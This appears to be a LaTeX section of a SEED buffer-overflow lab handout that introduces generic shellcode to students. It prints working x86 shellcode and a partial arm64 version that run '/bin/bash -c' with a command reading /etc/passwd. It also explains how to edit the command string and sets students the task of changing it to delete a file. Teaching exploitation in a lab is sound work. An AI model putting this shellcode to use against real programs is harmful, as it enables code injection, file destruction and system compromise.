
% *******************************************
% SECTION
% ******************************************* 
\section{Task 1: Get Familiar with the Shellcode}

The ultimate goal of buffer-overflow attacks is to inject
malicious code into the target program, so the code can be
executed using the target program's privilege.
Shellcode is widely used in most code-injection attacks.
Let us get familiar with it in this task.


Shellcode is typically used in code injection attacks.
It is basically a piece of code that launches a shell, and
is usually written in assembly languages.
In this lab, we only provide the binary version of a generic shellcode,
without explaining how it works, because it is non-trivial.
If you are interested in how exactly shellcode works, and
want to write a shellcode from scratch, you
can learn that from a separate SEED lab called \textit{Shellcode Lab}.
Our generic shellcode is listed in the following.
\ifdefined\arm
\else
We only list the x86 version (32-bit); the amd64 versions of shellcode
is similar.
\fi




\ifdefined\arm
% The arm64 version 
\begin{lstlisting}[language=python]
shellcode= (
   "\x0b\x05\x01\x10\x0c\x04\x84\xd2\x73\x01\x0c\xcb\x29\x01\x09\x4a"
   ... (lines omitted) ...
   "\x94\x02\x14\xca\xe2\x03\x14\xaa\xa8\x1b\x80\xd2\xe1\x66\x02\xd4"
   "/bin/bash*"                                                       (*@\ding{202}@*)
   "-c****"                                                           (*@\ding{203}@*)
   "/bin/ls -l; echo Hello 64; /bin/tail -n 4 /etc/passwd          *" (*@\ding{204}@*)
   # The * in this line serves as the position marker              *
   "AAAAAAAA"   # Placeholder for argv[0] --> "/bin/bash"
   "BBBBBBBB"   # Placeholder for argv[1] --> "-c"
   "CCCCCCCC"   # Placeholder for argv[2] --> the command string
   "DDDDDDDD"   # Placeholder for argv[3] --> NULL
).encode('latin-1')
\end{lstlisting}

\else
% The x86 version 
\begin{lstlisting}[language=python]
shellcode = (
   "\xeb\x29\x5b\x31\xc0\x88\x43\x09\x88\x43\x0c\x88\x43\x47\x89\x5b"
   "\x48\x8d\x4b\x0a\x89\x4b\x4c\x8d\x4b\x0d\x89\x4b\x50\x89\x43\x54"
   "\x8d\x4b\x48\x31\xd2\x31\xc0\xb0\x0b\xcd\x80\xe8\xd2\xff\xff\xff"
   "/bin/bash*"                                                     (*@\ding{202}@*)
   "-c*"                                                            (*@\ding{203}@*)
   "/bin/ls -l; echo Hello; /bin/tail -n 2 /etc/passwd        *"    (*@\ding{204}@*)
   # The * in this line serves as the position marker         *
   "AAAA"   # Placeholder for argv[0] --> "/bin/bash"
   "BBBB"   # Placeholder for argv[1] --> "-c"
   "CCCC"   # Placeholder for argv[2] --> the command string
   "DDDD"   # Placeholder for argv[3] --> NULL
).encode('latin-1')
\end{lstlisting}
\fi


The shellcode runs the \texttt{"/bin/bash"} shell program (Line~\ding{202}),
but it is given two arguments, \texttt{"-c"} (Line~\ding{203}) and
a command string (Line~\ding{204}). This indicates that the shell program
will run the commands in the second argument.
The \texttt{*} at the end of these strings is only a placeholder,
and it will be replaced by
one byte of \texttt{0x00} during the execution of the shellcode.
Each string needs to have a zero at the end, but we cannot put
zeros in the shellcode. Instead, we put a placeholder at the end of each string,
and then dynamically put a zero in the placeholder during the
execution.

If we want the shellcode to run some other commands,
we just need to modify the command string in Line~\ding{204}.
However, when making changes, we need to
make sure not to change the length of this string, because the
starting position of the placeholder for the \texttt{argv[]} array,
which is right after the command string,
is hardcoded in the binary portion of the shellcode. If
we change the length, we need to modify the binary part.
To keep the star at the end of this string at the same position,
you can add or delete spaces.



\ifdefined\arm
You can find the generic shellcode in the \texttt{shellcode} folder.
Inside, you will see a Python program called \texttt{shellcode\_64.py}. 
It will write the binary shellcode to \texttt{codefile\_64}.
You can then use 
\texttt{call\_shellcode} to execute the shellcode in it. 

\begin{lstlisting}
// Generate the shellcode binary 
$ ./shellcode_64.py    (*@\pointright{}@*) generate codefile_64

// Compile call_shellcode.c
$ make                 (*@\pointright{}@*) generate a64.out 

// Test the shellcode 
$ a64.out              (*@\pointright{}@*) execute the shellcode in codefile_64
\end{lstlisting}

\else 
You can find the generic shellcode in the \texttt{shellcode} folder.
Inside, you will see two Python programs, 
\texttt{shellcode\_32.py} and \texttt{shellcode\_64.py}. 
They are for 32-bit and 64-bit shellcode, respectively. 
These two Python programs will
write the binary shellcode to \texttt{codefile\_32}
and \texttt{codefile\_64}, respectively. You can then use 
\texttt{call\_shellcode} to execute the shellcode in them. 

\begin{lstlisting}
// Generate the shellcode binary 
$ ./shellcode_32.py    (*@\pointright{}@*) generate codefile_32
$ ./shellcode_64.py    (*@\pointright{}@*) generate codefile_64

// Compile call_shellcode.c
$ make                 (*@\pointright{}@*) generate a32.out and a64.out 

// Test the shellcode 
$ a32.out              (*@\pointright{}@*) execute the shellcode in codefile_32
$ a64.out              (*@\pointright{}@*) execute the shellcode in codefile_64
\end{lstlisting}
\fi 
 

\paragraph{Task.} Please modify the shellcode, so you can
use it to delete a file.  Please include your modified shellcode
in the lab report, as well as your screenshots.

